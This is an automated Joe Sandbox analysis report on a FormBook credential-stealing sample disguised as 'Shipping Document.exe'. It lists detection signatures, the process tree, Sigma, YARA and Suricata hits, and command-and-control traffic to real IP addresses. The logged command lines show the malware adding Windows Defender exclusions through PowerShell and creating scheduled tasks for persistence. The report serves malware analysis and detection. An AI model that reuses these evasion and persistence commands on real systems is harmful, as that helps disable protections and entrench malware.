Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Shipping Document.exe

Overview

General Information

Sample name:Shipping Document.exe
Analysis ID:1630657
MD5:ef66db2edaf759d35a2c4bc13c327f37
SHA1:b70b2c2f3f3a25742671b6cedd1d237b2282f9db
SHA256:7948d6bc00bb389e09c76ae4428fea70cbca1a58eacdf98295faba9d1b1b34be
Tags:exeShippinguser-cocaman
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
PE file has nameless sections
Performs DNS queries to domains with low reputation
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Shipping Document.exe (PID: 7076 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
    • powershell.exe (PID: 5724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6284 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\KOENBvWt.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6216 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 4908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Shipping Document.exe (PID: 5984 cmdline: "C:\Users\user\Desktop\Shipping Document.exe" MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
      • rtO5LARBHjW9nKZi.exe (PID: 3032 cmdline: "C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\EFkRtwBfT.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • xcopy.exe (PID: 7376 cmdline: "C:\Windows\SysWOW64\xcopy.exe" MD5: 7E9B7CE496D09F70C072930940F9F02C)
          • firefox.exe (PID: 7704 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • KOENBvWt.exe (PID: 1260 cmdline: C:\Users\user\AppData\Roaming\KOENBvWt.exe MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
    • schtasks.exe (PID: 7272 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • KOENBvWt.exe (PID: 7320 cmdline: "C:\Users\user\AppData\Roaming\KOENBvWt.exe" MD5: EF66DB2EDAF759D35A2C4BC13C327F37)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            10.2.Shipping Document.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              10.2.Shipping Document.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 5724, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 5724, ProcessName: powershell.exe
                Sigma detected: Suspicious Add Scheduled Task Parent
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\KOENBvWt.exe, ParentImage: C:\Users\user\AppData\Roaming\KOENBvWt.exe, ParentProcessId: 1260, ParentProcessName: KOENBvWt.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmp765E.tmp", ProcessId: 7272, ProcessName: schtasks.exe
                Sigma detected: Suspicious Copy From or To System Directory
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\xcopy.exe", CommandLine: "C:\Windows\SysWOW64\xcopy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\xcopy.exe, NewProcessName: C:\Windows\SysWOW64\xcopy.exe, OriginalFileName: C:\Windows\SysWOW64\xcopy.exe, ParentCommandLine: "C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\EFkRtwBfT.exe" , ParentImage: C:\Program Files (x86)\BVXtEZvlkPfjXAGLPPHyWsHNeabYnalJiTPCmXxhAcnQrAzKzLhSpGfl\rtO5LARBHjW9nKZi.exe, ParentProcessId: 3032, ParentProcessName: rtO5LARBHjW9nKZi.exe, ProcessCommandLine: "C:\Windows\SysWOW64\xcopy.exe", ProcessId: 7376, ProcessName: xcopy.exe
                Sigma detected: Suspicious Schtasks From Env Var Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", ProcessId: 4908, ProcessName: schtasks.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Shipping Document.exe", ProcessId: 5724, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Sigma detected: Scheduled temp file as task from temp location
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping Document.exe", ParentImage: C:\Users\user\Desktop\Shipping Document.exe, ParentProcessId: 7076, ParentProcessName: Shipping Document.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\KOENBvWt" /XML "C:\Users\user\AppData\Local\Temp\tmpC1E2.tmp", ProcessId: 4908, ProcessName: schtasks.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-06T05:39:08.850413+010020507451Malware Command and Control Activity Detected192.168.2.75001913.248.169.4880TCP
                2025-03-06T05:39:45.675226+010020507451Malware Command and Control Activity Detected192.168.2.749750199.59.243.22880TCP
                2025-03-06T05:40:09.659558+010020507451Malware Command and Control Activity Detected192.168.2.7497968.210.49.13980TCP
                2025-03-06T05:40:22.816362+010020507451Malware Command and Control Activity Detected192.168.2.74982713.248.169.4880TCP
                2025-03-06T05:40:37.808100+010020507451Malware Command and Control Activity Detected192.168.2.74985313.248.169.4880TCP
                2025-03-06T05:40:51.118790+010020507451Malware Command and Control Activity Detected192.168.2.749883162.0.213.9480TCP
                2025-03-06T05:41:04.594913+010020507451Malware Command and Control Activity Detected192.168.2.749911144.76.229.20380TCP
                2025-03-06T05:41:57.386745+010020507451Malware Command and Control Activity Detected192.168.2.749940188.114.96.380TCP
                2025-03-06T05:42:10.752786+010020507451Malware Command and Control Activity Detected192.168.2.7500033.33.130.19080TCP
                2025-03-06T05:42:24.086875+010020507451Malware Command and Control Activity Detected192.168.2.75000792.204.40.9880TCP
                2025-03-06T05:43:16.343577+010020507451Malware Command and Control Activity Detected192.168.2.750011104.21.16.180TCP
                2025-03-06T05:43:31.317435+010020507451Malware Command and Control Activity Detected192.168.2.75001513.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-06T05:39:08.850413+010028554651A Network Trojan was detected192.168.2.75001913.248.169.4880TCP
                2025-03-06T05:39:45.675226+010028554651A Network Trojan was detected192.168.2.749750199.59.243.22880TCP
                2025-03-06T05:40:09.659558+010028554651A Network Trojan was detected192.168.2.7497968.210.49.13980TCP
                2025-03-06T05:40:22.816362+010028554651A Network Trojan was detected192.168.2.74982713.248.169.4880TCP
                2025-03-06T05:40:37.808100+010028554651A Network Trojan was detected192.168.2.74985313.248.169.4880TCP
                2025-03-06T05:40:51.118790+010028554651A Network Trojan was detected192.168.2.749883162.0.213.9480TCP
                2025-03-06T05:41:04.594913+010028554651A Network Trojan was detected192.168.2.749911144.76.229.20380TCP
                2025-03-06T05:41:57.386745+010028554651A Network Trojan was detected192.168.2.749940188.114.96.380TCP
                2025-03-06T05:42:10.752786+010028554651A Network Trojan was detected192.168.2.7500033.33.130.19080TCP
                2025-03-06T05:42:24.086875+010028554651A Network Trojan was detected192.168.2.75000792.204.40.9880TCP
                2025-03-06T05:43:16.343577+010028554651A Network Trojan was detected192.168.2.750011104.21.16.180TCP
                2025-03-06T05:43:31.317435+010028554651A Network Trojan was detected192.168.2.75001513.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-06T05:40:02.019238+010028554641A Network Trojan was detected192.168.2.7497818.210.49.13980TCP
                2025-03-06T05:40:04.573070+010028554641A Network Trojan was detected192.168.2.7497868.210.49.13980TCP
                2025-03-06T05:40:07.120011+010028554641A Network Trojan was detected192.168.2.7497908.210.49.13980TCP
                2025-03-06T05:40:15.210084+010028554641A Network Trojan was detected192.168.2.74981113.248.169.4880TCP
                2025-03-06T05:40:18.667636+010028554641A Network Trojan was detected192.168.2.74981713.248.169.4880TCP
                2025-03-06T05:40:20.267291+010028554641A Network Trojan was detected192.168.2.74982313.248.169.4880TCP
                2025-03-06T05:40:28.331277+010028554641A Network Trojan was detected192.168.2.74983913.248.169.4880TCP
                2025-03-06T05:40:32.757050+010028554641A Network Trojan was detected192.168.2.74984113.248.169.4880TCP
                2025-03-06T05:40:35.303778+010028554641A Network Trojan was detected192.168.2.74984713.248.169.4880TCP
                2025-03-06T05:40:43.499293+010028554641A Network Trojan was detected192.168.2.749868162.0.213.9480TCP
                2025-03-06T05:40:46.015667+010028554641A Network Trojan was detected192.168.2.749874162.0.213.9480TCP
                2025-03-06T05:40:48.569792+010028554641A Network Trojan was detected192.168.2.749880162.0.213.9480TCP
                2025-03-06T05:40:56.969972+010028554641A Network Trojan was detected192.168.2.749894144.76.229.20380TCP
                2025-03-06T05:40:59.480533+010028554641A Network Trojan was detected192.168.2.749899144.76.229.20380TCP
                2025-03-06T05:41:02.038452+010028554641A Network Trojan was detected192.168.2.749905144.76.229.20380TCP
                2025-03-06T05:41:11.352337+010028554641A Network Trojan was detected192.168.2.749922188.114.96.380TCP
                2025-03-06T05:41:13.991506+010028554641A Network Trojan was detected192.168.2.749928188.114.96.380TCP
                2025-03-06T05:41:16.680649+010028554641A Network Trojan was detected192.168.2.749934188.114.96.380TCP
                2025-03-06T05:42:02.920777+010028554641A Network Trojan was detected192.168.2.7500003.33.130.19080TCP
                2025-03-06T05:42:05.439581+010028554641A Network Trojan was detected192.168.2.7500013.33.130.19080TCP
                2025-03-06T05:42:08.004730+010028554641A Network Trojan was detected192.168.2.7500023.33.130.19080TCP
                2025-03-06T05:42:16.448235+010028554641A Network Trojan was detected192.168.2.75000492.204.40.9880TCP
                2025-03-06T05:42:18.989878+010028554641A Network Trojan was detected192.168.2.75000592.204.40.9880TCP
                2025-03-06T05:42:21.545551+010028554641A Network Trojan was detected192.168.2.75000692.204.40.9880TCP
                2025-03-06T05:42:30.852640+010028554641A Network Trojan was detected192.168.2.750008104.21.16.180TCP
                2025-03-06T05:42:33.400624+010028554641A Network Trojan was detected192.168.2.750009104.21.16.180TCP
                2025-03-06T05:42:35.945019+010028554641A Network Trojan was detected192.168.2.750010104.21.16.180TCP
                2025-03-06T05:43:23.675838+010028554641A Network Trojan was detected192.168.2.75001213.248.169.4880TCP
                2025-03-06T05:43:26.229650+010028554641A Network Trojan was detected192.168.2.75001313.248.169.4880TCP
                2025-03-06T05:43:28.782654+010028554641A Network Trojan was detected192.168.2.75001413.248.169.4880TCP
                2025-03-06T05:43:36.840197+010028554641A Network Trojan was detected192.168.2.75001613.248.169.4880TCP
                2025-03-06T05:43:40.429632+010028554641A Network Trojan was detected192.168.2.75001713.248.169.4880TCP
                2025-03-06T05:43:42.976351+010028554641A Network Trojan was detected192.168.2.75001813.248.169.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-06T05:40:02.019238+010028563181A Network Trojan was detected192.168.2.7497818.210.49.13980TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeReversingLabs: Detection: 32%
                Multi AV Scanner detection for submitted file
                Source: Shipping Document.exeVirustotal: Detection: 35%Perma Link
                Source: Shipping Document.exeReversingLabs: Detection: 31%
                Yara detected FormBook
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.Shipping Document.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.1435018247.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3687248383.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3704953659.0000000005CA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3701996615.0000000003900000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1436402174.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000016.00000002.3699622847.0000000003630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000015.00000002.3701837200.0000000002C80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.1438223772.0000000001420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Shipping Document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Shipping Document.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: xcopy.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Shipping Document.exe, Shipping Document.exe, 0000000A.00000002.1436632647.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1437540108.0000000003882000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003BCE000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000002.3702185850.0000000003A30000.00000040.00001000.00020000.00000000.sdmp, xcopy.exe, 00000016.00000003.1435763271.00000000036D5000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: xcopy.pdb source: Shipping Document.exe, 0000000A.00000002.1436200153.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, rtO5LARBHjW9nKZi.exe, 00000015.00000003.1506541365.0000000000F85000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rtO5LARBHjW9nKZi.exe, 00000015.00000000.1358502913.0000000000F0F000.00000002.00000001.01000000.0000000F.sdmp
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_00B51AD0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h0_2_00B519E9
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_07FBCAE0
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h0_2_07FBF6E4
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_07FBFB80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07FBFB80
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then push dword ptr [ebp-24h]0_2_07FBFB74
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07FBFB74
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then xor edx, edx0_2_07FBFAB8
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then xor edx, edx0_2_07FBFAAC
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_07FBF860
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07FBF860
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then push dword ptr [ebp-20h]0_2_07FBF855
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh0_2_07FBF855
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then jmp 09977222h0_2_09976AAD
                Source: C:\Users\user\Desktop\Shipping Document.exeCode function: 4x nop then jmp 09977222h0_2_09976D2E
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h12_2_01151AD0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h12_2_011519C7
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then jmp 062B7846h12_2_062B70CE
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then jmp 062B7846h12_2_062B734F
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h12_2_0884CAE0
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then push dword ptr [ebp-20h]12_2_0884F858
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh12_2_0884F858
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then push dword ptr [ebp-20h]12_2_0884F860
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh12_2_0884F860
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then xor edx, edx12_2_0884FAAC
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then xor edx, edx12_2_0884FAB8
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then push dword ptr [ebp-24h]12_2_0884FB80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh12_2_0884FB80
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then push dword ptr [ebp-24h]12_2_0884FB74
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 7FFFFFFFh12_2_0884FB74
                Source: C:\Users\user\AppData\Roaming\KOENBvWt.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h12_2_0884F6E4

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.7:49750 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49781 -> 8.210.49.139:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.7:49750 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.7:49839 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.7:49781 -> 8.210.49.139:80
